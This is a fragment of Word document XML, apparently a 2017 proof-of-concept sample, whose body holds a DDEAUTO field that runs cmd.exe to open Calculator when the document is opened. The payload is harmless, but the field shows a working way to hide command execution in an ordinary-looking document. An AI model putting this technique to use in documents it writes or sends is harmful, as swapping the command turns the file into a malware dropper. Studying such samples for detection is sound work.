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E3182" w14:textId="77777777" w:rsidR="00597876" w:rsidRDefault="00C46585">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D41538">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "\c calc.exe"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="005978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85"/>
    <w:rsid w:val="005705A5"/>
    <w:rsid w:val="00992C60"/>
    <w:rsid w:val="00B26276"/>
    <w:rsid w:val="00C46585"/>
    <w:rsid w:val="00D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EC3B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C67C01FF-68AB-4D62-A74B-66001D13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Mayhem United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Klaaborg Stubman</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Magnus Klaaborg Stubman</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-02T20:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-02T20:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>